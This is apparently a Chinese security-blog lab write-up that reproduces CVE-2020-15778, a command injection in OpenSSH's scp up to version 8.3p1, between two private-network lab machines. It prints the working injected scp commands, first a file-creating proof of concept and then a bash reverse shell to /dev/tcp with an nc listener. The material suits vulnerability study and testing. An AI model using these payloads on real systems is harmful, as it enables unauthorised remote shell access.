OpenSSH 命令注入漏洞(CVE-2020-15778)

介绍

2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

漏洞影响版本

OpenSSH =< 8.3p1

漏洞复现要求

OpenSSH =< 8.3p1

需要知道ssh密码

搭建环境

centOS 7    IP:192.168.7.67

kali2019.4  IP:192.168.7.79

介绍一下scp命令:

下面开始行动:

关闭防火墙,(我没有关闭,在这里我也就不关闭了。)

查看ssh版本吧

1.ssh -V

 首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件

scp 1.txt root@192.168.7.67:'`touch /tmp/test.txt` /tmp'

 成功将kali上面的文件传入道centOS7面,和自己创建了文件。

直接进行nc反弹获取shell

先监听一个端口

  1. nc -lvvp 7777 

 进行反弹shell

scp test.txt root@192.168.7.67:'`bash -i >& /dev/tcp/192.168.7.79/7777 0>&1`/tmp/test1.txt'

成功拿取权限

总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值